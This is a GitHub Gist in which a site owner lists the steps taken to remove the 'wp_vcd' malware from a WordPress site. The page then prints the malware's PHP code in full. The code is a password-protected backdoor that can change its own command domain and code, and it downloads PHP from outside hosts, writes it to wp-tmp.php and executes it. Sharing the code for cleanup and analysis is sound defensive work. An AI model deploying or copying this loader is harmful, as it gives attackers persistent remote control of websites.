Created
January 10, 2019 10:23
-
-
Save mohammadkhoeini/729a3df330786612f48be4570ba1a6ba to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
What I did to slove problem | |
In wp-include directory, delete wp-vcd.php and class.wp.php files | |
In wp-include directory, open post.php and detele first php tag added by Malware. | |
Open to theme’s functions.php file, and delete the above codes. | |
This should stop popups. But I don’t now how long it works. | |
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '429acb1c29e4800452a3538a8f91edd0')) | |
{ | |
$div_code_name="wp_vcd"; | |
switch ($_REQUEST['action']) | |
{ | |
case 'change_domain'; | |
if (isset($_REQUEST['newdomain'])) | |
{ | |
if (!empty($_REQUEST['newdomain'])) | |
{ | |
if ($file = @file_get_contents(__FILE__)) | |
{ | |
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) | |
{ | |
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); | |
@file_put_contents(__FILE__, $file); | |
print "true"; | |
} | |
} | |
} | |
} | |
break; | |
case 'change_code'; | |
if (isset($_REQUEST['newcode'])) | |
{ | |
if (!empty($_REQUEST['newcode'])) | |
{ | |
if ($file = @file_get_contents(__FILE__)) | |
{ | |
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) | |
{ | |
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); | |
@file_put_contents(__FILE__, $file); | |
print "true"; | |
} | |
} | |
} | |
} | |
break; | |
default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; | |
} | |
die(""); | |
} | |
$div_code_name = "wp_vcd"; | |
$funcfile = __FILE__; | |
if(!function_exists('theme_temp_setup')) { | |
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; | |
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { | |
function file_get_contents_tcurl($url) | |
{ | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); | |
curl_setopt($ch, CURLOPT_HEADER, 0); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_URL, $url); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
return $data; | |
} | |
function theme_temp_setup($phpCode) | |
{ | |
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); | |
$handle = fopen($tmpfname, "w+"); | |
if( fwrite($handle, "<?php\n" . $phpCode)) | |
{ | |
} | |
else | |
{ | |
$tmpfname = tempnam('./', "theme_temp_setup"); | |
$handle = fopen($tmpfname, "w+"); | |
fwrite($handle, "<?php\n" . $phpCode); | |
} | |
fclose($handle); | |
include $tmpfname; | |
unlink($tmpfname); | |
return get_defined_vars(); | |
} | |
$wp_auth_key='70daf53a6c8b84ec5c45e84e576ae4d2'; | |
if (($tmpcontent = @file_get_contents("http://www.denom.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.denom.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
if (stripos($tmpcontent, $wp_auth_key) !== false) { | |
extract(theme_temp_setup($tmpcontent)); | |
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { | |
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
if (!file_exists(get_template_directory() . '/wp-tmp.php')) { | |
@file_put_contents('wp-tmp.php', $tmpcontent); | |
} | |
} | |
} | |
} | |
elseif ($tmpcontent = @file_get_contents("http://www.denom.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { | |
if (stripos($tmpcontent, $wp_auth_key) !== false) { | |
extract(theme_temp_setup($tmpcontent)); | |
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { | |
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
if (!file_exists(get_template_directory() . '/wp-tmp.php')) { | |
@file_put_contents('wp-tmp.php', $tmpcontent); | |
} | |
} | |
} | |
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
extract(theme_temp_setup($tmpcontent)); | |
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
extract(theme_temp_setup($tmpcontent)); | |
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
extract(theme_temp_setup($tmpcontent)); | |
} elseif (($tmpcontent = @file_get_contents("http://www.denom.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.denom.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
extract(theme_temp_setup($tmpcontent)); | |
} | |
} | |
} | |
//wp_tmp | |
//$end_wp_theme_tmp | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment